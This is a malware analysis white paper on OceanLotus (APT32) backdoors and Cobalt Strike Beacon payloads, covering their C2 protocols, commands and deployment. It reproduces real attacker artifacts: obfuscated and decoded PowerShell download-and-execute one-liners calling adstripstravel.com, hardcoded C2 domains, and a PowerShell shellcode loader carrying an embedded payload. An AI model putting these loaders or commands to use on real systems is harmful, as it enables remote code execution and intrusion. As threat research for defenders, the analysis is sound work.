# The SpyRATs of OceanLotus ## Malware Analysis White Paper ----- # Contents **Introduction ��������������������������������������������������������������������������������������������4** **Components��������������������������������������������������������������������������������������������4** **Roland RAT����������������������������������������������������������������������������������������������4** **Overview���������������������������������������������������������������������������������������������������4** **Features����������������������������������������������������������������������������������������������������4** **Behavior����������������������������������������������������������������������������������������������������5** **C2�����������������������������������������������������������������������������������������������������������������7** Protocol�����������������������������������������������������������������������������������������������7 Commands��������������������������������������������������������������������������������������10 **CamCapture Plugin����������������������������������������������������������������������������14** **Overview������������������������������������������������������������������������������������������������14** **Features�������������������������������������������������������������������������������������������������15** **Exported Functions���������������������������������������������������������������������������15** Screenshot Grabbing Exports��������������������������������������������������15 VIDEO Capture Exports���������������������������������������������������������������16 Helper Exports�������������������������������������������������������������������������������17 Unused Exports�����������������������������������������������������������������������������17 **Remy RAT�����������������������������������������������������������������������������������������������18** **Overview������������������������������������������������������������������������������������������������18** **Features�������������������������������������������������������������������������������������������������18** **Deployment������������������������������������������������������������������������������������������18** **Behavior�������������������������������������������������������������������������������������������������18** **C2��������������������������������������������������������������������������������������������������������������23** Protocol��������������������������������������������������������������������������������������������23 Commands��������������������������������������������������������������������������������������29 **Splinter RAT������������������������������������������������������������������������������������������30** **Overview������������������������������������������������������������������������������������������������30** **Features�������������������������������������������������������������������������������������������������30** **Behavior�������������������������������������������������������������������������������������������������30** **C2��������������������������������������������������������������������������������������������������������������32** Protocol��������������������������������������������������������������������������������������������32 Commands��������������������������������������������������������������������������������������33 Backdoor Error Codes�����������������������������������������������������������������34 **CobaltStrike Beacon #1�������������������������������������������������������������������35** **Overview������������������������������������������������������������������������������������������������35** **Deployment������������������������������������������������������������������������������������������36** **CobaltStrike Beacon #2�������������������������������������������������������������������36** **Overview������������������������������������������������������������������������������������������������36** **Deployment������������������������������������������������������������������������������������������36** **Behavior�������������������������������������������������������������������������������������������������37** **Rizzo��������������������������������������������������������������������������������������������������������39** **Overview������������������������������������������������������������������������������������������������39** **Behavior�������������������������������������������������������������������������������������������������39** **C2��������������������������������������������������������������������������������������������������������������41** Protocol��������������������������������������������������������������������������������������������41 Commands��������������������������������������������������������������������������������������42 **Denis���������������������������������������������������������������������������������������������������������42** **Overview������������������������������������������������������������������������������������������������42** **Behavior�������������������������������������������������������������������������������������������������42** **Network Intelligence������������������������������������������������������������������������45** **167.114.44.146����������������������������������������������������������������������������������45** Whois������������������������������������������������������������������������������������������������45 Domains�������������������������������������������������������������������������������������������46 First seen�����������������������������������������������������������������������������������������46 **87.117.234.172����������������������������������������������������������������������������������47** Whois������������������������������������������������������������������������������������������������47 Domains�������������������������������������������������������������������������������������������47 First seen�����������������������������������������������������������������������������������������47 **27.102.67.42����������������������������������������������������������������������������������������48** Whois 48 ----- Whois������������������������������������������������������������������������������������������������48 Domains�������������������������������������������������������������������������������������������49 First Seen�����������������������������������������������������������������������������������������49 **185.244.213.28 ���������������������������������������������������������������������������������49** Whois������������������������������������������������������������������������������������������������49 First seen�����������������������������������������������������������������������������������������50 **Conclusions������������������������������������������������������������������������������������������50** **Appendix������������������������������������������������������������������������������������������������50** ----- During an incident response investigation in the final quarter of 2017, Cylance[®] incident responders and threat researchers uncovered several bespoke backdoors deployed by OceanLotus Group (a.k.a. APT32, Cobalt Kitty), as well as evidence of the threat actor using obfuscated CobaltStrike Beacon payloads to perform C2. The threat actor routinely leveraged PowerShell within the environment, using one-liners to download/deploy malware, as well as obfuscators and reflective PE/shellcode loaders from various exploit kits (including MSFvenom, Veil, and DKMC), allowing much of the malware to operate in-memory, with no on-disk footprint. The remote access trojans developed by OceanLotus Group (Roland, Remy, and Splinter, named after famous rodents) ### Components During the investigation, the following backdoors were uncovered: **File Name** **Classification** certcredprovider.dll.mui Malware/Backdoor underwears.png Malware/Backdoor wpfgfx_v0300.dll Malware/Backdoor plugin.lst Malware/Infostealer user.ico Malware/Backdoor img.png Malware/Backdoor mobsync.exe Malware/Backdoor varies Malware/Backdoor ### Roland RAT share subtle code similarities with “Backdoor.Win32.Denis” (Kaspersky), “WINDSHIELD” and “KOMPROGO” (FireEye). Roland was of particular interest in that it was carefully developed to mimic legitimate software DLLs developed by the victim organization. The malware C2 protocols were largely tailored for each target, and supported a range of communication methods, from raw data over TCP sockets to HTTP/S proxying. In addition, the threat actor relied heavily upon CobaltStrike Beacon for providing malleable C2 communications. The remaining white paper is dedicated to in-depth technical analysis of the malware, C2 protocols, TTPs, and general observations. **Overview** Roland arrives as an un-obfuscated Win32 PE DLL. This particular version has been packaged to resemble a legitimate DLL, and contains a custom C2 protocol supporting a range of file, registry, process and memory operations, as well as a reverse shell, FTP file uploads, and retrieving system/user information. **Features** - Mimics legitimate DLL - Custom C2 protocol - 37 C2 commands ----- Roland starts by creating a thread that initializes COM and dispatches to the main RAT entry-point, passing parameters supplied by the calling application via the heap: _Figure 1: Roland RAT entry-point_ The initial configuration supplied to the RAT is a UTF-16 encoded string, using newlines characters (“\n”) to separate values in the following format: Hostname/IP Port Unused Victim ID Connection timeout _Figure 2: Configuration format_ Note that the configuration is not bundled with the backdoor DLL, and is instead supplied as parameters by the calling application. Next, the RAT calls the GetAddrInfoW API on the supplied hostname/IP, opens the socket, and connects to the C2 server: _Figure 3: GetAddrInfoW/socket/connect_ ----- _Figure 4: C2 handshake_ After a successful handshake, the RAT will attempt to receive and process new commands issued by the C2 server in a loop: _Figure 5: C2 command loop_ ----- **_Protocol_** The Roland C2 protocol is relatively simple, employing a simple handshake and a common header packet prior to all request/ response payloads: **Handshake** **Request Header** **Request and Parameters** **Response Header** **Response and Data** _Figure 6: C2 protocol overview_ Checksums are loosely based on the MS-PST CRC32 algorithm, but require only the first four tables: **Def** checksum(buffer, crc32=0xffffffff): offset = 0 **for i in range(0, len(buffer)** **%** 4): crc32 = CRC32.Offset32[(struct.unpack(“B”, buffer[offset:offset+1])[0] **^ crc32)** **&** 0xff] **^** **(crc32 >>** 8) offset += 1 **for i in range(0, len(buffer)** **/** 4): crc32 ^= struct.unpack(“I”, buffer[offset:offset + 4])[0] crc32 **= CRC32.Offset56[crc32** **&** 0xff] **^ CRC32.Offset48[(crc32** **>>** 8) **&** 0xff] **^ CRC32.** Offset40[(crc32 >> 16) **&** 0xff] **^ CRC32.Offset32[(crc32 >>** 24) **&** 0xff] offset += 4 **return** **~crc32 &** 0xffffffff Compression is performed using zlib (with the library containing the string “Fast decoding Code from Chris Anderson”), and can be inflated using the following code: **def** decompress(data): “””Decompress using zlib””” decompress = zlib.decompressobj() inflated = decompress.decompress(data) inflated += decompress.flush() **return inflated** Request/response data is trivially encoded using byte level XOR with a key of 0xC7. ----- is random), followed by a 64-byte victim ID. The server then responds with a 64-byte payload (sent byte-by-byte), assumed to be a session ID (this is not verified by the client): _Figure 7: Handshake_ After a successful handshake, the attacker is free to start issuing commands. A 100-byte header specifies the size of the following data, as well as the checksum. XOR encrypted command data is sent next (at least 160-bytes), containing the command ID, lengths, checksums, and any parameters: _Figure 8: C2 request header and encoded request data_ typedef struct _C2_HEADER { unsigned char Padding[20]; /* Can be null */ unsigned long SizeOfData; /* Size of next packet (C2_REQUEST_DATA/C2_RESPONSE_DATA) */ unsigned long ChecksumOfData; /* Checksum of next packet (C2_REQUEST_DATA/C2_ RESPONSE_DATA) */ unsigned char SessionId[64]; /* Possibly contains a copy of the session ID */ unsigned long Magic; /* Can be null for requests, 0x005A15E9 for response */ unsigned long Trailing; /* Can be null */ } C2_HEADER, *PC2_HEADER; _Figure 9: C2 header structure_ ----- typedef struct _C2_REQUEST_DATA { unsigned char Padding[132]; /* Can be null */ unsigned long CommandId; /* eg. 0x5B (volume_info) */ unsigned long Unused; unsigned long ParametersLength; /* Length of Parameters[] */ unsigned long UnpackedParametersLength; /* If != ParametersLength then use zlib */ unsigned long ParametersCrc; /* Checksum of Parameters[] */ unsigned long UnpackedParametersCrc; /* Checksum of decompressed Parameters[] */ unsigned long HeaderCrc; /* Checksum of preceding 0x9c bytes */ unsigned char Parameters[]; /* Parameters as UNICODE string or compressed with zlib */ } C2_REQUEST_DATA, *PC2_REQUEST_DATA; _Figure 10: C2 request structure_ The RAT will process the command before sending a response to the server comprising another header, followed by the response data, which contains the lengths, checksums, and response data (possibly zlib compressed): _Figure 11: C2 response header and encoded response data_ typedef struct _C2_RESPONSE_DATA { unsigned char VictimId[64]; unsigned char SessionId[64]; unsigned long BotVersion; /* 0x487 */ unsigned long CommandId; /* eg. 0x5B (volume_info) */ unsigned long ErrorCode; /* Command error code */ unsigned long DataLength; /* Length of Data[] */ unsigned long UnpackedDataLength; /* Unpacked length of Data[] */ unsigned long DataCrc; /* Checksum of Parameters[] */ unsigned long UnpackedDataCrc; /* Checksum of decompressed Data[] */ unsigned long HeaderCrc; /* Checksum of preceding 0x9c bytes */ unsigned char Data[]; /* Response, compressed using zlib */ } C2_RESPONSE_DATA, *PC2_RESPONSE_DATA; _Figure 12: C2 response header_ ----- The following commands were supported by the version of Roland analyzed: ----- **p** ----- **p** _Figure 13: exec_cmd running ipconfig_ ----- _Figure 14: Information collected by get_system_info command_ _Figure 15: Custom archive file_ ----- ### p g **Classification** Malware/Infostealer **Size** 118KB (120320 bytes) **Type** Win32 PE (DLL) **File Name** plugin.lst **Timestamp** Wed, 24 Oct 2007 04:23:10 UTC (spoofed) **Observed** November 2017 **Overview** This Win32 PE DLL arrives in a partially obfuscated form with its entry point obscured by garbage opcodes, useless instructions, and non-linear code flow: _Figure 16: Obfuscated entry point_ It exports several functions that can possibly be invoked with the use of Roland backdoor’s run_dll command. _Figure 17: Threat actor command to download and install Remy_ ----- **Features** - 10 functioning exports and five additional “template” exports - Main functionality is to grab desktop screenshots and record webcam video - Use of Microsoft Media Foundation (Mf.dll) and Video For Windows (avicap32.dll) **Exported Functions** Each function, besides FDITruncateCabinet and FDICopy, takes the following arguments: - Pointer to Unicode string with parameters in a “-INT” format (eg. for sleep_timeout and quality: “-1200 -100”) - Pointer to memory that will receive address of the buffer with captured image stream - Pointer to memory that will receive size of the capture buffer The quality, show_wnd, and sleep_timeout parameters are optional and default to: 0x32, 0, 0 respectively. If show_wnd_bool is set, it will call ShowWindow in case the window is minimized. **_Screenshot Grabbing Exports_** **Name** **Parameters** **Description** FCICreate quality Grab screenshot of desktop window FCIAddFile quality Grab screenshot of foreground window FCIFlushFolder hWnd, quality, show_wnd_ Grab screenshot of specified window bool, sleep_timeout FCIDestroy x1, y1, cx, cy, quality Grab screenshot of specified rectangle in the foreground window FDICreate hWnd, x1, y1, cx, cy, quality, Grab screenshot of specified show_wnd, sleep_timeout rectangle in the specified window These exports use a subset of GDI32 APIs to create a screenshot of the victim’s desktop or a specified window. _Figure 18: Screenshot functionality_ |Screenshot Grabbing Exports|Col2|Col3| |---|---|---| |Name|Parameters|Description| |FCICreate|quality|Grab screenshot of desktop window| |FCIAddFile|quality|Grab screenshot of foreground window| |FCIFlushFolder|hWnd, quality, show_wnd_ bool, sleep_timeout|Grab screenshot of specified window| |FCIDestroy|x1, y1, cx, cy, quality|Grab screenshot of specified rectangle in the foreground window| |FDICreate|hWnd, x1, y1, cx, cy, quality, show_wnd, sleep_timeout|Grab screenshot of specified rectangle in the specified window| ----- |Name|Parameters|Description| |---|---|---| |FDIIsCabinet|sleep_timeout, quality|Creates a thread that will capture video using VFW - Video For Windows (avicap32.dll)| |FDIDestroy|sleep_timeout, quality|Creates a thread that will capture video using MF - Microsoft Media Foundation (Mf.dll)| The video capture functionality is based on two different implementations, one using Video For Windows, and the other using MS Media Foundation. _Figure 19: VFW-based video capture_ _Figure 20: MF-based video capture_ ----- |Name|Parameters|Description| |---|---|---| |FDITruncateCabinet|none|Return 0xE42 (possibly the plugin version)| |FDICopy|none|Enumerate video capture drivers| _Figure 21: Get version_ _Figure 22: Enumerate drivers_ **_Unused Exports_** The following functions call nothing besides the routine that parses the parameters; they possibly constitute a template function for further functionalities not yet implemented: - CreateCompressor – template code for function with one parameter - SetCompressorInformation – template code for function with two parameters - QueryCompressorInformation – template code for function with three parameters - ResetCompressor – template code for function with four parameters - CloseCompressor – template code for function with five parameters ----- ### y **Classification** Malware/Backdoor **Aliases** WINDSHIELD (FireEye) **Size** 355 KB (364,353 bytes) **Type** PowerShell/Shellcode/Win32 PE (DLL) **File Name** underwears.png **Timestamp** Thu, August 07 2008 01:43:09 UTC (spoofed) **Observed** November 2017 **Overview** Arriving as an obfuscated PowerShell script built using the MSFvenom psh-reflection payload, the Remy DLL payload is ultimately unpacked, injected into memory, and executed via a Veil shellcode payload. _Figure 23: Payload layers_ The Remy DLL shares code with Backdoor.Win32.Denis (Kaspersky), and appears to be related to the “WINDSHIELD” malware (described in the FireEye APT32 report). **Features** - Several PowerShell “wrappers” - MSFvenom psh-reflection payload - Veil powersell/shellcode_inject - Main functionality is to download and execute next stage payloads - Six additional C2 commands - Proxy bypass **Deployment** Remy was downloaded and executed manually by the threat actor using a PowerShell one-liner: _Figure 24: Threat actor command to download and install Rem_ **Behavior** During loading, a C# source file is dropped to disk and compiled using the C# .NET compiler: _Figure 25: Compiling .NET binary_ ----- _Figure 26: C# compiler arguments_ Although a relatively novel technique, this does lead to the creation of multiple temporary files under the %APPDATA%\Temp folder: _Figure 27: Files created during compilation_ The source file is relatively simple and is used to assist with importing Windows APIs: _Figure 28: C# source code for importing Win32 APIs_ _Figure 29: PowerShell shellcode loader_ ----- - RtlMoveMemory - RtlZeroMemory - VirtualAlloc - GetProcAddress - LoadLibrary The shellcode then allocates executable memory via VirtualAlloc, unpacks the main DLL payload, and calls its entry-point function: _Figure 30: Execute main payload DLL entry-point_ The payload is ~248 KB (253,952 bytes) large, and purports to have been compiled on Thu Aug 07 01:43:07 2008. Originally named XamlDiagnostics.dll, it exports a single entry-point named DllEntry. The DllEntry routine first loads advapi32.dll, imports/calls GetUserNameW, and attempts to create the following mutex to prevent multiple instances from running: _151c9beb11b29fe869098007192d8fa7_%USERNAME%_ It then loads several libraries, resolves all necessary APIs, and decrypts embedded strings. Most of the strings are encrypted with simple ADD 0x27 instruction. _Figure 31: String decryption – mutex name_ The backdoor can be executed with credentials for web authentication specified as parameters via the command line: ----- XOR key), in the following format: **Offset** **Description** 0x00 Magic (0x02) 0x05 Username length 0x07 Password length 0x09 Username 0x09 + Username length Password The RCDATA resource from the analyzed sample did not contain any hard-coded credentials: **Bytes** **ASCII** **Description** 3B 6C 49 6C 5A 4B 6E 47 3D ;lIlZKnG= Encrypted resource content 39 6C 49 6C 5A 4B 6E 47 3D 9lIlZKnG= Embedded XOR key 02 00 00 00 00 00 00 00 00 Decrypted resource content _Figure 32: Decryption of RCDATA resource_ ----- registry key: **Value Name** **Type** (default) REG_BINARY EditFlags REG_BINARY DisableProcessIsolation REG_BINARY REG_DWORD _Figure 33: Check for C2 URL in registry_ _Figure 34: Decryption of URL from registry value_ |Value Name|Type|Size|Description| |---|---|---|---| |(default) EditFlags DisableProcessIsolation |REG_BINARY REG_BINARY REG_BINARY REG_DWORD|32 bytes Variable 8 bytes 4 bytes|Value sent by the C2 server upon initial communication; it's needed to initiate download/execution of additional malware stages List of C2 URLs encoded with XOR 0x8A8B8C; can be set using one of the C2 commands System time, set at the time of the first C2 connection These values are queried/set by the C2 server during the process of downloading and executing additional stages| ----- the following hardcoded URLs: - happy.abelleds.com - far.ordanuy.com - home.runnerfd.com - dyndns.yceunca.com _Figure 35: Hardcoded C2 domains_ The malware has the capability to detect and bypass the victim’s proxy configuration. There are two possible operation modes: - TCP sockets, on port 61781 (default) or on port 443 (in case victim’s machine is configured to use a proxy) - HTTP POST/GET on ports 80 or 443, with the optional use of authentication (supports Basic and Digest schemes) **C2** **_Protocol_** Initially, the backdoor will connect to one of the C2 URLs using raw sockets and perform a simple handshake: ----- will first try to connect to the proxy and authenticate (if required): - HTTP proxy (1) and HTTPS proxy (2) - connect to the proxy URL with the following header: CONNECT %s:%d HTTP/1.1 Host: %s:%d Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36 _Figure 36: HTTP proxy URL headers_ Note: The User-Agent string first appeared in Chrome from February 2016. _Figure 37: Connection via HTTP proxy_ The backdoor also supports Basic and Digest HTTP authentication methods. In case of Digest authentication, the backdoor will use the hardcoded string “d35efe4ba43e3803d57b4945fa3ab5dd” as the value for client nonce parameter. _Figure 38: Strings related to HTTP authentication, hardcoded “cnonce” value highlighted_ ----- - SOCKS5 proxy (5) – connect to the proxy server on specified port and send client connection request: Send 3 bytes: 05 01 00 Recv 2 bytes: 05 00 Send 10 bytes: 05 01 00 01 + c2_port + c2_ip Recv 10 bytes. _Figure 39: Connection via socks5 proxy_ ----- details of the first active network adapter (excluding loopback), and send this information to the C2 server: - Send 4-bytes (size of the upcoming packet) - Send packet with system information: **Offset** **Size** **Description** 0x0000 4 bytes Decompressed size 0x0004 4 bytes Compressed size 0x0008 zlib compressed system information (decompressed size 0x199 bytes) _Figure 40: System information packet_ _Figure 41: Basic communication scheme_ ----- _Figure 42: Decompressed system information structure_ The following diagram shows a request containing system information, with the compressed (green) and decompressed (red) sizes, zlib data (blue), and finally the decompressed information (pink): ----- commands and sending responses. _Figure 44: Thread responsible for downloading and executing next stage payloads_ Once an internal event is set, the backdoor will contact the C2 server to download and execute additional stages. To do that, it will proceed as follows: - Connect and send beacon based on the internally specified connection method - Send 1 byte (0x06) - Send data from the “(default)” value in the registry (32-bytes), zlib compressed - Receive a 4-byte integer that will be used as registry value name - Send data from that registry value (4-bytes) - Receive 4-bytes (size of upcoming packet) - Receive zlib compressed packet containing next stage payload - Decompressed data format: _regval_data_len_ _regval_data_ _path_len_ _path_ _file_content_size_ _file_content_ _commandline_len_ _commandline_ - Write file_content to path (create directories if needed) - Create process path commandline - Set registry value to the regval_data - Send 4-byte response (last error code). ----- Besides executing additional next-stage payloads, the backdoor can process six additional commands. _Figure 45: Command processor_ The C2 command packets have the following format: **Offset** **Description** 0x00 Unknown 0x04 Command ID 0x08 Length of parameters 0x0C Parameters The following commands are supported: ----- ### p **Classification** Malware/Backdoor **Aliases** WINDSHIELD (FireEye) **Size** 355 KB (364,353 bytes) **Type** PowerShell/Shellcode/Win32 PE (DLL) **File Name** underwears.png **Timestamp** Thu, August 07 2008 01:43:09 UTC (spoofed) **Observed** November 2017 **Overview** Splinter arrives as an MSBuild project file containing a Base64 encoded PowerShell script generated using the MSFvenom pshreflection module. As in the case of Remy, it utilizes on-the-fly C# compilation and strips off several PowerShell wrappers before the shellcode that calls the final payload is invoked. The backdoor itself is a Win32 PE EXE file and has the capability to collect information, download and execute payloads, run WMI queries, and manipulate files, processes, and registry entries. The overall functionality of Splinter appears pretty much in line with the “KOMPROGO” malware (as described in the FireEye APT32 report). **Features** - Several PowerShell “wrappers” - MSFvenom psh-reflection payload - Veil powershell/shellcode_inject - Custom C2 protocol (different from Remy and Roland) - 38 C2 commands - Use of LZHAM for compression of backdoor response data **Behavior** The backdoor will not attempt to communicate with the C2 if any of these network monitors are running: - wireshark.exe (check for running process) - NetworkMiner.exe (check for running process) - TCPView (check for window name) _Figure 46: Find network monitors_ ----- As in the case of other backdoors used by the OceanLotus Group, the most sensitive strings, including hardcoded C2 addresses, are stack-based and obfuscated with one-byte incremental XOR: _Figure 47: Stack-based string decryption_ _Figure 48: String decryption loop_ The following URLs are hardcoded in the binary: - rss.honoremarson[.]com (89.249.65.134, 185.244.213.28) - repo.paigeherzog[.]com (89.249.65.134, 185.244.213.28) - ssl.wolfgangneudorf[.]com (89.249.65.134, 185.244.213.28) - help.angelinagerste[.]com (69.64.147.33, 185.244.213.28) - mms.garyschulze[.]com (69.64.147.35, 91.195.240.103) The backdoor also maintains a hardcoded list of ports to use, including 443, 1364, and 35357. After sending an initial handshake, composed of two hardcoded values (request code and victim’s ID) buried inside pseudo-random data, the backdoor will send the contents of the “Key” value from [HKLM|HKCU]\Software\Microsoft\GameCenter\Identity. If this value is empty or doesn’t exist, the malware will send a hardcoded string instead. ----- _Figure 49: C2 communication_ The C2 server is expected to respond first with a header, that will indicate the size of upcoming packet, followed by a value that will be written by the backdoor to the same registry location. Then, the C2 communicates with the backdoor by sending a header containing command code and length of parameters, followed by a packet containing the command parameters string. **C2** **_Protocol_** The standard C2 request/response consists of a 40-byte header packet, that includes the request code, hardcoded value (bot version or victim ID), compression indicator and length of upcoming data, and is padded with pseudo-randomly generated bytes. If the length field is not 0, the header is followed by a variable size packet containing data and optionally compressed with LZHAM algorithm. The header of each C2 command packet additionally contains the command code, length of session ID, length of uncompressed data (optionally), and two boolean values indicating if the data is compressed and if the backdoor should compress the response. The size of the data packet is calculated by combining the length of data with the length of session ID. The session ID value sent by the C2 is prepended to the data packet in the backdoor’s response. ----- **g** **g** **q** **p** **q** **p** _Figure 50: Initial C2 packet with request code and victim ID highlighted in red_ _Figure 51: Second packet. RED: request code, size of data, victim id, compression bool; GREEN: data – hardcoded key_ **_Commands_** 0x208B4194 Source CSIDL, source filename, destination CSIDL, destination file name, overwrite existing bool Copy specified file ----- **p** **_Backdoor Error Codes_** ----- **Overview** This PowerShell script unpacks a copy of Beacon from the Cobalt Strike penetration testing framework. When launched, it tries to reach adstripstravel.com/activity over HTTP (the same host it was originally downloaded from): _Figure 52: C2 Traffic from Beacon DLL_ Is this a modified version of Beacon or straight out-of-the-box? The single exported function common to the Beacon DLL provides a pivot, linking a further 260 samples. Similarity between these and our payload is measured using the command line tool “tlsh”. From this, we determine 201 samples have a score of <=64 (out of 1000; i.e., very similar). BinDiff indicates the closest matching sample is 96% similar. Comparison between the closest matching sample and our payload DLL reveals a lack of HTTP proxy support. This feature was added in Cobalt Strike 3.7. A further two unmatched functions in our pivot sample add support for file copying and moving – another feature added in Cobalt Strike 3.7. _Figure 53: Proxy support in pivot sample_ _Figure 54: Null proxy arguments in payload DLL_ ----- “ppid” command “to enable consent.exe to launch elevated processes with the non-elevated requester as the parent”. There are no primary unmatched functions, meaning the payload DLL is an unmodified version of Beacon from Cobalt Strike 3.6 or earlier. **Deployment** The following event was observed during forensic investigations: Windows PowerShell/PowerShell ID **[600]** **:EventData/Data** **->** **[0] Variable[1] Started[2]** ProviderName=Variable NewProviderState=Started SequenceNumber=11 HostName=ConsoleHost HostVersion=4.0 HostId=12988b1b-e7f7-43ee-a01f-0eb01b11ea22 HostApplication=POwErshElL **-nONiNtera -noL -noprOFI -EXE bYpasS -nOEXIT -w HIddEN -coMma “ $(Set-ItEM ‘variAble:OFS’** ‘’ )” **+[striNg]((** 95 **-83-78-54** **-** 62-62 **-** 120-115-97 **-** 59 **-121-** 116 **-** 124- 115 **-117-** 98 **-** 54 **-** 120-115 **-** 98-56 **-97** **-115-116** **-117** **-122-127-** 115-120-98-63 **-56** **-114** **-** 121-97- 120 **-** 122 **-121-119** **-** 114- 101-98 **-100-127-** 120 **-113** **-62-49-** 126-98 **-98-102** **-44-57** **-57** **-119** **-** 114- 10198-100-127 **-** 102-101-98 **-** 100-119 **-96-115** **-** 122- 56 **-** 117-121-123- 57-100- 115 **-101** **-** 121 **-** 99 **-100** **-117-115-101** **-57** **-127-** 123 **-119** **-** 113-115 **-101-57** **-127-123-** 113 **-56** **-** 102 **-120-** 113-49- 63- 63 **)** **|FoReACh** **{[ChaR]** **(** **$_-bxoR** 0x16 ) **}** **)+”$( Sv ‘OFs’ ‘ ‘) “|.** **((gET-VaRiabLe** ‘*MdR*’).NaMe[3-11-2]-joIN’’) EngineVersion= RunspaceId= PipelineId= CommandName= CommandType= ScriptName= CommandPath= CommandLine=- EventData/Binary -> empty _Figure 55: PowerShell event_ The decoded PowerShell evaluates to: IEX((new-objectnet.webclient).downloadstring(‘http://adstripstravel.com/user.ico’)) _Figure 56: Decoded PowerShell_ ### CobaltStrike Beacon #2 **Classification** Malware/Backdoor **Size** 282 KB (289,385 bytes) **Type** PowerShell/Shellcode **File Name** img.png **Observed** November 2017 **Overview** This PowerShell script contains a simple shellcode backdoor operated over named pipe and appears to be a component relating to CobaltStrike Beacon’s malleable C2. Several versions of this backdoor have been observed using subtly different pipe names with the format: \\.\pipe\status_# (where # is replaced with an integer) **Deployment** The following event was observed during forensic investigations: |Classification|Malware/Backdoor 282 KB (289,385 bytes) PowerShell/Shellcode img.png November 2017| |---|---| |Size|| |Type|| |File Name|| |Observed|| ----- Windows PowerShell/PowerShell ID **[600]** **:EventData/Data** **->** **[0] Variable[1] Started[2]** ProviderName=Variable NewProviderState=Started SequenceNumber=11 HostName=ConsoleHost HostVersion=4.0 HostId=fcb07468-ed83-4082-b089-e92e26b6ed33 HostApplication=POwersheLL -NOex **-wInDOwSTYL HiDDen -nOLOgo -EXECUtIoNpOl BYPaSs -NOPr -nOninTERacti -Comman .** **((geT-vARiAble** ‘*mDR*’).namE[3-11-2]-JoiN’’) **(“ $( SeT ‘Ofs’ ‘’ ) “+[STriNg](** **(82-** 94 **-** 67-59-51 **-** 51117-126 **-108-** 54- 116 **-121** **-113** **-** 126 **-120** **-** 111 **-59** **-117-126-111** **-53** **-108** **-** 126 **-121-** 120 **-** 119 **-** 114- 126 **-117-** 111-50 **-53** **-127** **-116** **-108-117-119-** 116 **-122** **-** 127- 104- 111 **-** 105-114 **-** 117- 124 **-** 51-60- 115- 111 **-** 111- 107 **-** 33- 52 **-** 52-122-127-104-111 **-** 105 **-** 114 **-** 107- 104 **-111** **-105-** 122 **-** 109- 126 **-119** **-** 53 **-120-116** **-118-52** **-** 110 **-** 104-126-105 **-53** **-** 114- 120-11660 **-50-** 50) **|foReACH** **{** **[char]** **(** **$_** **-bxoR 0x1b )})+” $(set ‘OfS’ ‘ ‘)”) EngineVersion=** RunspaceId= PipelineId= CommandName= CommandType= ScriptName= CommandPath= CommandLine=EventData/Binary -> empty _Figure 57: PowerShell event_ The decoded PowerShell evaluates to: IEX((new-objectnet.webclient).downloadstring(‘http://adstripstravel.com/resources/images/ img.png’)) _Figure 58: Simple PowerShell downloader_ **Behavior** The downloaded payload was ultimately executed as a service to maintain persistence: System/Service Control Manager ID [7045] :EventData/Data -> ServiceName = b8d0bfd ImagePath = %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -encodedcommand __ _Figure 59: System event showing PowerShell one-liner service_ The Base64 encoded command from the event decodes to: ----- Set-StrictMode -Version 2 **$DoIt** **= @’** **function func_get_proc_addre ss {** Param ($var_module, **$var_procedure)** **$var_unsafe_native_methods** **=** **([AppDomain]::CurrentDomain.GetAssemblies()** **|** Where-Object **{** **$_.GlobalAssemblyCache -And $_.Location.Split(‘\\’)[-1].Equals(‘System.dll’)** **}).GetType(‘Microsoft.** Win32.UnsafeNativeMethods’) **return** **$var_unsafe_native_methods.GetMethod(‘GetProcAddress’).Invoke($null, @([System.Runtime.** InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), **($var_unsafe_native_methods.GetMethod(‘GetModuleHandle’)).Invoke($null, @($var_module)))),** **$var_** **procedure))** **}** **function func_get_delegate_type {** Param ( **[Parameter(Position =** 0, Mandatory = **$True)]** **[Type[]]** **$var_parameters,** **[Parameter(Position =** 1)] **[Type]** **$var_return_type** **=** **[Void]** **)** **$var_type_builder** **=** **[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.** Reflection.AssemblyName(‘ReflectedDelegate’)), **[System.Reflection.Emit.AssemblyBuilderAccess]::Run).** DefineDynamicModule(‘InMemoryModule’, **$false).DefineType(‘MyDelegateType’,** ‘Class, Public, Sealed, AnsiClass, AutoClass’, **[System.MulticastDelegate])** **$var_type_builder.DefineConstructor(‘RTSpecialName, HideBySig, Public’,** **[System.Reflection.** CallingConventions]::Standard, **$var_parameters).SetImplementationFlags(‘Runtime, Managed’)** **$var_type_builder.DefineMethod(‘Invoke’,** ‘Public, HideBySig, NewSlot, Virtual’, **$var_return_** **type,** **$var_parameters).SetImplementationFlags(‘Runtime, Managed’)** **return** **$var_type_builder.CreateType()** **}** **[Byte[]]$var_code** **=** **[System.Convert]::FromBase64String(“/OiJAAAAYInlMdJki1Iwi1IMi1IUi3IoD7dKJjH/** McCsPGF8Aiwgwc8NAcfi8FJXi1IQi0I8AdCLQHiFwHRKAdBQi0gYi1ggAdPjPEmLNIsB1jH/McCswc8NAcc44HX0A334O30k deJYi1gkAdNmiwxLi1gcAdOLBIsB0IlEJCRbW2FZWlH/4FhfWosS64ZdMcBqQGgAEAAAaP//BwBqAGhYpFPl/9VQ6agAAAB aMclRUWgAsAQAaACwBABqAWoGagNSaEVw39T/1VCLFCRqAFJoKG994v/VhcB0bmoAagBqAInmg8YEieKDwgiLfCQMagBWag RSV2itnl+7/9WLVCQQagBWaAAgAABSV2itnl+7/9WFwHQUi0wkBIsEJAHIiQQki1QkEAHC69eLfCQMV2jA+t38/9VXaMaWh 1L/1YsEJItMJAg5wXQHaPC1olb/1f9kJBDoU////1xcLlxwaXBlXHN0YXR1c180NTk4AA==”) **$var_buffer** **=** **[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_** proc_address kernel32.dll VirtualAlloc), **(func_get_delegate_type @([IntPtr],** **[UInt32],** **[UInt32],** **[UInt32])** **([IntPtr]))).Invoke([IntPtr]::Zero,** **$var_code.Length,0x3000,** 0x40) **[System.Runtime.InteropServices.Marshal]::Copy($var_code,** 0, **$var_buffer,** **$var_code.length)** **$var_hthread** **=** **[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_** proc_address kernel32.dll CreateThread), **(func_get_delegate_type @([IntPtr],** **[UInt32],** **[IntPtr],** **[IntPtr],** **[UInt32],** **[IntPtr])** **([IntPtr]))).Invoke([IntPtr]::Zero,0,$var_buffer,[IntPtr]::Zero,4,** **[IntPtr]::Zero)** 